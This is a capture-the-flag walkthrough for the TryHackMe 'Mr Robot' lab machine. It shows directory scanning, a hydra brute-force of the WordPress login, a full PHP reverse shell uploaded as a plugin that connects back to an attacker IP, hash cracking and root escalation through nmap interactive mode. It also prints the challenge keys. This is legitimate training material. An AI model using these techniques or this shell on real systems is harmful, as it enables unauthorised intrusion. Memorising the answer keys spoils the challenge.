Mr Robot CTF

TryHackMe | Mr Robot CTF

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Credit to Leon Johnson for creating this machine.

Setup

1kali@kali:~$ gobuster dir -u http://10.10.157.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

1kali@kali:~$ gobuster dir -u http://10.10.157.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
2===============================================================
3Gobuster v3.0.1
4by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
5===============================================================
6[+] Url:            http://10.10.157.219/
7[+] Threads:        10
8[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
9[+] Status codes:   200,204,301,302,307,401,403
10[+] User Agent:     gobuster/3.0.1
11[+] Timeout:        10s
12===============================================================
132020/05/09 16:45:41 Starting gobuster
14===============================================================
15/images (Status: 301)
16/blog (Status: 301)
17/sitemap (Status: 200)
18/rss (Status: 301)
19/login (Status: 302)
20/0 (Status: 301)
21/feed (Status: 301)
22/video (Status: 301)
23/image (Status: 301)
24/atom (Status: 301)
25/wp-content (Status: 301)
26/admin (Status: 301)
27/audio (Status: 301)
28/wp-login (Status: 200)
29/intro (Status: 200)
30/css (Status: 301)
31/rss2 (Status: 301)
32/license (Status: 200)
33/wp-includes (Status: 301)
34/js (Status: 301)
35/Image (Status: 301)
36/rdf (Status: 301)
37/page1 (Status: 301)
38/readme (Status: 200)
39/robots (Status: 200)

1kali@kali:~$ curl http://10.10.157.219/fsocity.dic > password.txt

#1 What is key 1?

1073403c8a58a1f80d943455fb30724b9

#2 What is key 2?

1kali@kali:~$ hydra -l Elliot -P password.txt 10.10.157.219 http-post-form "/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=10.10.157.219/wp-admin/&testcookie=1:S=302"

1[80][http-post-form] host: 10.10.157.219   login: "Elliot"  password: "ER28-0652"

Now let’s implement some php reverse shell.

1<?php
2/*
3Plugin Name:  Reverse Shell
4Plugin URI: http://shell.com
5Description: gimme a shell
6Version: 1.0
7Text Domain: shell
8Domain Path: /languages
9*/
10// php-reverse-shell - A Reverse Shell implementation in PHP
11// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
12
13set_time_limit (0);
14$VERSION = "1.0";
15$ip = '10.9.2.228';  // CHANGE THIS
16$port = 9999;       // CHANGE THIS
17$chunk_size = 1400;
18$write_a = null;
19$error_a = null;
20$shell = 'uname -a; w; id; /bin/sh -i';
21$daemon = 0;
22$debug = 0;
23
24//
25// Daemonise ourself if possible to avoid zombies later
26//
27
28// pcntl_fork is hardly ever available, but will allow us to daemonise
29// our php process and avoid zombies.  Worth a try...
30if (function_exists('pcntl_fork')) {
31    // Fork and have the parent process exit
32    $pid = pcntl_fork();
33
34    if ($pid == -1) {
35        printit("ERROR: Can't fork");
36        exit(1);
37    }
38
39    if ($pid) {
40        exit(0);  // Parent exits
41    }
42
43    // Make the current process a session leader
44    // Will only succeed if we forked
45    if (posix_setsid() == -1) {
46        printit("Error: Can't setsid()");
47        exit(1);
48    }
49
50    $daemon = 1;
51} else {
52    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
53}
54
55// Change to a safe directory
56chdir("/");
57
58// Remove any umask we inherited
59umask(0);
60
61//
62// Do the reverse shell...
63//
64
65// Open reverse connection
66$sock = fsockopen($ip, $port, $errno, $errstr, 30);
67if (!$sock) {
68    printit("$errstr ($errno)");
69    exit(1);
70}
71
72// Spawn shell process
73$descriptorspec = array(
74   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
75   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
76   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
77);
78
79$process = proc_open($shell, $descriptorspec, $pipes);
80
81if (!is_resource($process)) {
82    printit("ERROR: Can't spawn shell");
83    exit(1);
84}
85
86// Set everything to non-blocking
87// Reason: Occsionally reads will block, even though stream_select tells us they won't
88stream_set_blocking($pipes[0], 0);
89stream_set_blocking($pipes[1], 0);
90stream_set_blocking($pipes[2], 0);
91stream_set_blocking($sock, 0);
92
93printit("Successfully opened reverse shell to $ip:$port");
94
95while (1) {
96    // Check for end of TCP connection
97    if (feof($sock)) {
98        printit("ERROR: Shell connection terminated");
99        break;
100    }
101
102    // Check for end of STDOUT
103    if (feof($pipes[1])) {
104        printit("ERROR: Shell process terminated");
105        break;
106    }
107
108    // Wait until a command is end down $sock, or some
109    // command output is available on STDOUT or STDERR
110    $read_a = array($sock, $pipes[1], $pipes[2]);
111    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
112
113    // If we can read from the TCP socket, send
114    // data to process's STDIN
115    if (in_array($sock, $read_a)) {
116        if ($debug) printit("SOCK READ");
117        $input = fread($sock, $chunk_size);
118        if ($debug) printit("SOCK: $input");
119        fwrite($pipes[0], $input);
120    }
121
122    // If we can read from the process's STDOUT
123    // send data down tcp connection
124    if (in_array($pipes[1], $read_a)) {
125        if ($debug) printit("STDOUT READ");
126        $input = fread($pipes[1], $chunk_size);
127        if ($debug) printit("STDOUT: $input");
128        fwrite($sock, $input);
129    }
130
131    // If we can read from the process's STDERR
132    // send data down tcp connection
133    if (in_array($pipes[2], $read_a)) {
134        if ($debug) printit("STDERR READ");
135        $input = fread($pipes[2], $chunk_size);
136        if ($debug) printit("STDERR: $input");
137        fwrite($sock, $input);
138    }
139}
140
141fclose($sock);
142fclose($pipes[0]);
143fclose($pipes[1]);
144fclose($pipes[2]);
145proc_close($process);
146
147// Like print, but does nothing if we've daemonised ourself
148// (I can't figure out how to redirect STDOUT like a proper daemon)
149function printit ($string) {
150    if (!$daemon) {
151        print "$string\n";
152    }
153}
154
155?>

But before we need to zip the shell.php to upload it.

1kali@kali:~/Desktop$ zip shell.zip shell.php
2adding: shell.php (deflated 59%)

Great we successfully upload our php shell ! Let’s active it

Nice ! :D we have a shell let’s make it fancy now

1python -c 'import pty; pty.spawn("/bin/bash")'

As you can see we can’t see the key2 but we have an hash so let’s crack it

1kali@kali:~/Desktop$ hashcat -m 0 --force hashmrrobot /usr/share/wordlists/rockyou.txt

1c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz

#3 What is key 3?

1su -l robot
2Password: abcdefghijklmnopqrstuvwxyz

1robot@linux:~$ ls
2ls
3key-2-of-3.txt  password.raw-md5
4robot@linux:~$ cat key-2-of-3.txt
5cat key-2-of-3.txt
6822c73956184f694993bede3eb39f959

Final step getting root on the machine

On the TryHackMe website the hint was “nmap”

So i found this website https://pentestlab.blog/category/privilege-escalation/ and it worked ! :D

1robot@linux:~$ nmap --interactive
2nmap --interactive
3
4Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
5Welcome to Interactive Mode -- press h <enter> for help
6nmap> !sh
7!sh
8# ls
9ls
10key-2-of-3.txt  password.raw-md5
11# cd /root
12cd /root
13# ls
14ls
15firstboot_done  key-3-of-3.txt
16# cat key-3-of-3.txt
17cat key-3-of-3.txt
1804787ddef27c3dee1ee161b21670b4e4